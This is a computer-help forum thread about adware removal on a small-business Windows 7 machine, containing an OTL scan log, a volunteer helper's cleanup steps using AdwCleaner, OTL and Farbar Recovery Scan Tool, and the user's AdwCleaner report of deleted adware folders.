inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [Browse with Corel PaintShop Pro X6] -- "c:\Program Files\Corel\Corel PaintShop Pro X6 (64-bit)\Corel PaintShop Pro.exe" "%L" (Corel, Inc.)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{042E0485-C4C0-487C-9792-E4983EE01FD8}" = lport=137 | protocol=17 | dir=in | app=system |
"{1ECBC73B-82B8-41F1-843D-8618D0E80493}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{2495F63C-B869-418F-97BA-A2BFB090A5B6}" = rport=3702 | protocol=17 | dir=out | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{257D5B09-8105-471E-AB21-E044EEDEC8C5}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{2B75E634-6886-4C3F-A9FF-A08A76E69EF1}" = rport=445 | protocol=6 | dir=out | app=system |
"{39254F39-9AE6-40CC-AB63-2A834FF968AD}" = lport=3702 | protocol=17 | dir=in | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{3BDFDDC4-9E2A-45F1-8ACD-B7DF0FA51088}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{4FDA27CF-AA40-4543-8F13-84037F6CA274}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{503528AA-448D-4298-AE1C-F0E148821179}" = lport=139 | protocol=6 | dir=in | app=system |
"{67C7D15E-D155-4DA8-B05B-448D7ED00291}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{80A04AAE-89AD-42E2-B4E6-740C22856700}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{914B5CA7-B9A1-40D1-8196-3875412C63B8}" = rport=3702 | protocol=17 | dir=out | svc=fdrespub | app=%systemroot%\system32\svchost.exe |
"{9A2D8FEE-0243-47AF-8A9F-87341951A952}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{9FC039EB-658B-4E67-86A3-45F03D869A90}" = lport=6004 | protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\outlook.exe |
"{A60CAB90-1A11-48F5-B45E-E6C6354265A9}" = rport=137 | protocol=17 | dir=out | app=system |
"{BA611C86-66D3-4830-B4D7-A82BDDE2A0B6}" = lport=3702 | protocol=17 | dir=in | svc=fdphost | app=%systemroot%\system32\svchost.exe |
"{BF9E808A-5FD3-47A8-AF13-43EB2A51011D}" = lport=138 | protocol=17 | dir=in | app=system |
"{C35C858D-7090-4D2B-8A00-33A5EE825462}" = rport=139 | protocol=6 | dir=out | app=system |
"{CFDABE30-DA78-4599-8B55-1B2DFFE0B19E}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{D2BB6EF5-3635-42B5-BE2F-3221141CB775}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{D2C9CD71-EB82-45B2-B2B0-FACF078E5F39}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |
"{DC8222AF-C07C-425B-8FBC-AF2A44C35A8A}" = rport=138 | protocol=17 | dir=out | app=system |
"{EF2A9E85-BA56-4A95-8CDA-486071C831B9}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | [email protected],-28539 |
"{FFB69FF9-7A4F-4CA6-9188-BF6833A33D09}" = lport=445 | protocol=6 | dir=in | app=system |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0FAC9440-8ACB-4582-B954-20042110FDEA}" = protocol=58 | dir=out | [email protected],-28546 |
"{151AE92C-CE75-41AA-B26C-9F2E0E9A4078}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{1C2C07FD-D5F9-4FD5-B560-434FD4CE3D2B}" = protocol=1 | dir=in | [email protected],-28543 |
"{2A004938-564B-4ED5-93E0-AD7757AB2958}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{3EEFC092-B78B-4A67-B50D-11B2558A20E3}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{42B0B329-E162-4A78-82BA-C7A2B196F730}" = protocol=1 | dir=out | [email protected],-28544 |
"{44C8B45B-7DB4-4008-B72F-D88324CDD536}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{4CC3744D-D748-445C-B901-6B79A0DF8784}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |
"{58CD5429-91EC-4707-974B-8F84C57799E9}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |
"{77973324-E1DD-47BD-8555-9C35F4CEAC93}" = protocol=58 | dir=in | [email protected],-28545 |
"{B9ADEAE7-A696-4DB4-8F29-BDBA3BF0141C}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"TCP Query User{CD4411A3-A2D0-4753-ABC4-0F1666568FCB}C:\program files (x86)\idrivewindows\id_tray.exe" = protocol=6 | dir=in | app=c:\program files (x86)\idrivewindows\id_tray.exe |
"TCP Query User{D41B71FE-88E9-4132-8881-5625A4F72CE2}C:\program files (x86)\internet explorer\iexplore.exe" = protocol=6 | dir=in | app=c:\program files (x86)\internet explorer\iexplore.exe |
"UDP Query User{5FDAC73C-8F6E-4C64-8A4A-06D23472F1C1}C:\program files (x86)\internet explorer\iexplore.exe" = protocol=17 | dir=in | app=c:\program files (x86)\internet explorer\iexplore.exe |
"UDP Query User{64AF1D26-EECE-4290-838F-B980B339878E}C:\program files (x86)\idrivewindows\id_tray.exe" = protocol=17 | dir=in | app=c:\program files (x86)\idrivewindows\id_tray.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{16582334-495C-4F1C-A66B-3BFD8866B674}" = PSPPro64
"{1678F86C-889D-4198-8249-F4625058256B}" = IPM_PSP_COM64
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{26A24AE4-039D-4CA4-87B4-2F86417040FF}" = Java 7 Update 40 (64-bit)
"{350AA351-21FA-3270-8B7A-835434E766AD}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{81E20D41-C277-4526-934D-F2380AF91B78}" = iCloud
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{90140000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2010
"{90140000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2010
"{90140000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{977D1ABF-4089-4CA7-BA33-CC75808B7ACE}" = Intel® Trusted Connect Service Client
"{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}" = SAMSUNG USB Driver for Mobile Phones
"{D1B033E8-A077-4B0D-9831-5798E19E861E}" = Intel® Smart Connect Technology 2.0 x64
"CutePDF Writer Installation" = CutePDF Writer 3.0
"WinRAR archiver" = WinRAR 5.00 (64-bit)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"_{166D1CB6-DD8A-40DD-9E25-4D31D2D6DE4D}" = Corel PaintShop Pro X6
"_{DCDAB2ED-5741-4C30-A1A4-0FCB8A529001}" = WordPerfect Office X4
"{000AB2ED-5741-4C30-A1A4-0FCB8A529000}" = WordPerfect Office X4
"{11E91AF3-0B2A-4FE5-9D2F-CC3EDF2C0EBE}_is1" = TSPrint Client
"{11E91AF3-0B2A-4FE5-9D2F-CC3EDF2C8743}_is1" = TSScan Client
"{16006EE1-DDB7-4E5F-8696-9FEF32C0151A}" = Setup
"{161AB62E-65D6-46E5-B3D8-2AC15D3B920B}" = Corel PaintShop Pro X6
"{162BD2D6-6C63-41A7-8151-93188450D36A}" = PSPPContent
"{16346B2A-87BC-407C-9D6B-72A4D21ABF03}" = PSPPHelp
"{164D34E1-0271-4960-8A26-E8990A302DB1}" = IPM_PSP_COM
"{166D1CB6-DD8A-40DD-9E25-4D31D2D6DE4D}" = ICA
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{240C3DDD-C5E9-4029-9DF7-95650D040CF2}" = Intel® USB 3.0 eXtensible Host Controller Driver
"{2485354C-6B65-4978-BB91-CCE61442377B}" = SUABnR
"{26A24AE4-039D-4CA4-87B4-2F83217040FF}" = Java 7 Update 51
"{2CAD3C16-ACD0-43E5-81DA-7E56C3E5336C}" = ArcSoft MediaConverter 8
"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel® Rapid Storage Technology
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{580E9BBC-A51E-4AE9-A977-7B0939BEDAD3}" = Scanner Utility for Microsoft Windows V09L21
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel® Management Engine Components
"{69258FD1-F4EE-475A-83D1-BF68C8029592}" = Verizon Wireless Software Utility Application for Android - Samsung
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{77DCDCE3-2DED-62F3-8154-05E745472D07}" = Acrobat.com
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{84EE38CA-199D-3BCC-8649-3464469BB54C}" = Google Chrome
"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver
"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010
"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010
"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010
"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010
"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010
"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010
"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010
"{90140000-003D-0000-0000-0000000FF1CE}" = Microsoft Office Single Image 2010
"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010
"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010
"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010
"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{A3070098-A41D-42D9-B6D3-2EF15285E719}" = Verizon Wireless Software Upgrade Assistant - Samsung(ar)
"{A6C48A9F-694A-4234-B3AA-62590B668927}" = Intel® Manageability Engine Firmware Recovery Agent
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AC0224E5-0DE1-423D-A5EB-69FB8816A52F}_is1" = RetailEdge 8.2
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.08)
"{C779648B-410E-4BBA-B75B-5815BCEFE71D}" = Safari
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529001}" = WordPerfect Office X4 - ICA
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529010}" = WordPerfect Office X4 - Common
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529011}" = WordPerfect Office X4 - WP
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529012}" = WordPerfect Office X4 - QP
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529013}" = WordPerfect Office X4 - PR
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529014}" = WordPerfect Office X4 - Content
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529016}" = WordPerfect Office X4 - Skins
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529017}" = WordPerfect Office X4 - Filters
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529018}" = WordPerfect Office X4 - Graphics
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529023}" = WordPerfect Office X4 - System
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529030}" = WordPerfect Office X4 - Migration Manager
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529040}" = WordPerfect Office X4 - IPM
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529046}" = WordPerfect Office X4 - IPM T EN
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529050}" = WordPerfect Office X4 - PerfectExperts
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529080}" = WordPerfect Office X4 - MAIL
"{DCDAB2ED-5741-4C30-A1A4-0FCB8A529100}" = WordPerfect Office X4 - EN
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel® Processor Graphics
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F17C3DC2-2ACA-4B0E-BDBF-ACE61B14E7CD}" = Citrix Online Launcher
"{F7FFF37F-DB74-408C-840F-BD8B8E955B5B}" = FUJITSU Scanner USB HotFix
"{F8A9085D-4C7A-41a9-8A77-C8998A96C421}" = Intel® Control Center
"{FCB3772C-B7D0-4933-B1A9-3707EBACC573}" = Intel® SDK for OpenCL - CPU Only Runtime Package
"Adobe Flash Player ActiveX" = Adobe Flash Player 14 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 14 Plugin
"Advanced Scan to PDF Free_is1" = Advanced Scan to PDF Free 4.0.1
"avast" = avast! Free Antivirus
"Combined Community Codec Pack_is1" = Combined Community Codec Pack 2013-08-01
"Doxillion" = Doxillion Document Converter
"ExpressAccounts" = Express Accounts
"IDrive Windows_is1" = IDrive Version - 6.0
"InstallShield_{2485354C-6B65-4978-BB91-CCE61442377B}" = SUABnR
"IntelliScanner Software_is1" = IntelliScanner Software
"Inventoria" = Inventoria Stock Manager
"KLiteCodecPack_is1" = K-Lite Codec Pack 10.0.5 Full
"Mozilla Firefox 31.0 (x86 en-US)" = Mozilla Firefox 31.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Office14.SingleImage" = Microsoft Office Professional 2010
"Optimizer Pro_is1" = Optimizer Pro v3.2
"Pixillion" = Pixillion Image Converter
"Software Operation Panel" = Software Operation Panel
"VLC media player" = VLC media player 2.1.0
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"UnityWebPlayer" = Unity Web Player
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 8/13/2014 6:23:46 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = ISCT Agent | ID = 1003
Description =
 
Error - 8/13/2014 6:24:54 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = WinMgmt | ID = 10
Description =
 
Error - 8/15/2014 6:20:16 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = ISCT Agent | ID = 1003
Description =
 
Error - 8/15/2014 6:21:34 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = WinMgmt | ID = 10
Description =
 
Error - 8/28/2014 6:17:05 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = ISCT Agent | ID = 1003
Description =
 
Error - 8/28/2014 6:18:15 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = WinMgmt | ID = 10
Description =
 
Error - 8/29/2014 8:17:11 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MsiInstaller | ID = 10005
Description =
 
Error - 8/29/2014 8:17:13 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MsiInstaller | ID = 10005
Description =
 
Error - 8/29/2014 8:17:14 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MsiInstaller | ID = 10005
Description =
 
Error - 8/29/2014 8:17:15 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MsiInstaller | ID = 10005
Description =
 
[ Media Center Events ]
Error - 8/28/2014 7:55:04 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MCUpdate | ID = 0
Description = 4:55:03 AM - Failed to retrieve Directory (Error: Unable to connect
 to the remote server)  
 
Error - 8/28/2014 7:56:07 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MCUpdate | ID = 0
Description = 4:55:46 AM - Failed to retrieve NetTV (Error: Unable to connect to
 the remote server)  
 
Error - 8/28/2014 7:57:31 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MCUpdate | ID = 0
Description = 4:57:01 AM - Failed to retrieve MCEClientUX (Error: Invalid security
 token.)  
 
Error - 8/28/2014 8:59:08 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MCUpdate | ID = 0
Description = 5:59:08 AM - Failed to retrieve Directory (Error: Unable to connect
 to the remote server)  
 
Error - 8/28/2014 9:00:13 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MCUpdate | ID = 0
Description = 6:00:12 AM - Failed to retrieve MCEClientUX (Error: Unable to connect
 to the remote server)  
 
Error - 8/28/2014 10:00:59 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = MCUpdate | ID = 0
Description = 7:00:59 AM - Failed to retrieve Directory (Error: Unable to connect
 to the remote server)  
 
[ System Events ]
Error - 8/8/2014 2:16:54 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = Service Control Manager | ID = 7000
Description = The Util Deal Keeper service failed to start due to the following
error:   %%2
 
Error - 8/8/2014 2:16:54 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = Service Control Manager | ID = 7000
Description = The Update Deal Keeper service failed to start due to the following
 error:   %%2
 
Error - 8/8/2014 2:21:12 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = NETLOGON | ID = 5719
Description = This computer was not able to set up a secure session with a domain
controller
 in domain BRESSMAN due to the following:   %%1311    This may lead to authentication
problems. Make sure that this  computer is connected to the network. If the problem
 persists,  please contact your domain administrator.        ADDITIONAL INFO    If this computer
 is a domain controller for the specified domain, it  sets up the secure session to
 the primary domain controller emulator in the specified  domain. Otherwise, this
computer sets up the secure session to any domain controller  in the specified domain.
 
Error - 8/8/2014 2:21:13 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = Microsoft-Windows-GroupPolicy | ID = 1055
Description = The processing of Group Policy failed. Windows could not resolve the
 computer name. This could be caused by one of more of the following:   a) Name Resolution
 failure on the current domain controller.   b) Active Directory Replication Latency
 (an account created on another domain controller has not replicated to the current
 domain controller).
 
Error - 8/8/2014 2:22:00 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = Service Control Manager | ID = 7000
Description = The Update Deal Keeper service failed to start due to the following
 error:   %%2
 
Error - 8/8/2014 2:22:00 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = Service Control Manager | ID = 7000
Description = The Util Deal Keeper service failed to start due to the following
error:   %%2
 
Error - 8/13/2014 6:23:25 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = NETLOGON | ID = 5719
Description = This computer was not able to set up a secure session with a domain
controller
 in domain BRESSMAN due to the following:   %%1311    This may lead to authentication
problems. Make sure that this  computer is connected to the network. If the problem
 persists,  please contact your domain administrator.        ADDITIONAL INFO    If this computer
 is a domain controller for the specified domain, it  sets up the secure session to
 the primary domain controller emulator in the specified  domain. Otherwise, this
computer sets up the secure session to any domain controller  in the specified domain.
 
Error - 8/13/2014 6:23:48 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = Service Control Manager | ID = 7000
Description = The Update Deal Keeper service failed to start due to the following
 error:   %%2
 
Error - 8/13/2014 6:23:48 AM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = Service Control Manager | ID = 7000
Description = The Util Deal Keeper service failed to start due to the following
error:   %%2
 
Error - 8/13/2014 6:53:24 PM | Computer Name = OFFICE2.BRESSMAN.LOCAL | Source = Microsoft-Windows-GroupPolicy | ID = 1030
Description = The processing of Group Policy failed. Windows attempted to retrieve
 new Group Policy settings for this user or computer. Look in the details tab for
 error code and description. Windows will automatically retry this operation at
the next refresh cycle. Computers joined to the domain must have proper name resolution
 and network connectivity to a domain controller for discovery of new Group Policy
 objects and settings. An event will be logged when Group Policy is successful.
 
 
< End of report >
 


  • 0

#6
valgalvez

valgalvez

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Just wanted to let you know that I won't be able to return to this thread until tomorrow morning around 9am PST. Thanks for your help


  • 0

#7
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,583 posts

Will your IT guys allow us to run fixes on the machine? Just need to verify before I provide a fix. It's all prepared...I just need confirmation first. Thanks.


  • 0

#8
valgalvez

valgalvez

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Yes absolutely, this is a a small business, I am the Office Manager.. Thank you


Edited by valgalvez, 03 September 2014 - 09:44 AM.

  • 0

#9
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,583 posts

Then by all means let's get you cleaned up. Please follow the instructions below.

 

Step#1 - Uninstalls

Please uninstall the following program. Instructions for doing so are here. Please reboot if you are prompted to. Let me know if you have any issues uninstalling.
Optimizer Pro v3.2

 

 

Step#2 - AdWCleaner

1. Please download AdwCleaner by Xplode onto your desktop.

2. Close all open programs and internet browsers.

3. Right-click on AdwCleaner.exe and select Run as administrator to run the tool.

4. Click on Scan.

5. After the scan is complete click on "Clean"

6. Confirm each time with Ok.

7. Your computer will be rebooted automatically. A text file will open after the restart.

8. Please post the content of that logfile with your next answer.

9. If need be, you can also find the logfile at C:\AdwCleaner\AdwCleaner[S0].txt as well.

 

Step#3 - OTL Fix

1. Right click on OTL.exe and choose Run as administrator. Note: If you could move this file from your downloads folder to your desktop it would be best.
2. Open the attached text file in notepad. Attached File  fix.txt   3.15KB   79 downloads

3. Copy the contents of the file and paste it into the Custom Scans/Fixes section at the very bottom of the OTL program.

4. Click the Run Fix button. OTL will ask to reboot the machine. Please do so when asked.
5. After the reboot a log file should open. Copy/Paste the contents of the log that opens and post in your next reply. If for some reason the log file does not appear then you can
    open Notepad (Start->All Programs->Accessories->Notepad), click File->Open, in the File Name box enter *.log and press the Enter key, navigate to the C:\_OTL\MovedFiles folder,
    and open the newest .log file present, and copy/paste the contents of that document back here in your next post.

 

 

Step#4 - Fresh Set of Logs Needed
1. Please download Farbar Recovery Scan Tool and save it to your Desktop.

    Note: You need to run the 64-bit Version so please ensure you download that one.

2. Right click to run as administrator. When the tool opens click Yes to disclaimer.

3. Press Scan button.

4. It will produce a log called FRST.txt in the same directory the tool is run from (which should now be the desktop)

5. Please copy and paste log back here.

6. The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe). Please also paste that along with the FRST.txt into your reply.

 

 

Step#5 - How is your machine?

Let me know how your machine appears to be running after all of these steps.

 

  

 

 

Items for your next post

1. AdwCleaner Log

2. OTL Fix Log

3. FRST & Addition logs

4. How is your machine?


Edited by BrianDrab, 03 September 2014 - 10:10 AM.

  • 0

#10
valgalvez

valgalvez

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

So I started the AdwCleaner and it says "Pending. Please uncheck elements you don't want to remove" Should I just leave it alone?


  • 0

Advertisements


#11
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,583 posts

The Clean button should be available to click on. Go ahead and click on Clean.


  • 0

#12
valgalvez

valgalvez

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Ok so I proceeded to do the OTL fix and its been on "Creating restore point DO NOT INTERRUPT" for about 15 mins now, is this normal?


  • 0

#13
BrianDrab

BrianDrab

    Trusted Helper

  • Malware Removal
  • 3,583 posts

No that is not normal. Sometimes Antivirus Software can conflict with our fixes. I suggest that you end the OTL program and disable your AV before trying again. Instructions for doing so are here.

 

I would disable until reboot.


  • 0

#14
valgalvez

valgalvez

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Ok here it goes:

# AdwCleaner v3.309 - Report created 03/09/2014 at 10:21:04
# Updated 02/09/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
# Username : Administrator - OFFICE2
# Running from : C:\Users\administrator\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : {55dce8ba-9dec-4013-937e-adbf9317d990}w64

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\~0
Folder Deleted : C:\ProgramData\374311380
Folder Deleted : C:\ProgramData\apn
Folder Deleted : C:\ProgramData\AVG SafeGuard toolbar
Folder Deleted : C:\ProgramData\NCH Software
Folder Deleted : C:\ProgramData\tPerfeictcoupOOnu
Folder Deleted : C:\Program Files (x86)\AskPartnerNetwork
Folder Deleted : C:\Program Files (x86)\AVG SafeGuard toolbar
Folder Deleted : C:\Program Files (x86)\NCH Software
Folder Deleted : C:\Program Files (x86)\Optimizer Pro
Folder Deleted : C:\Users\ADMINI~1\AppData\Local\Temp\apn
File Deleted : C:\END
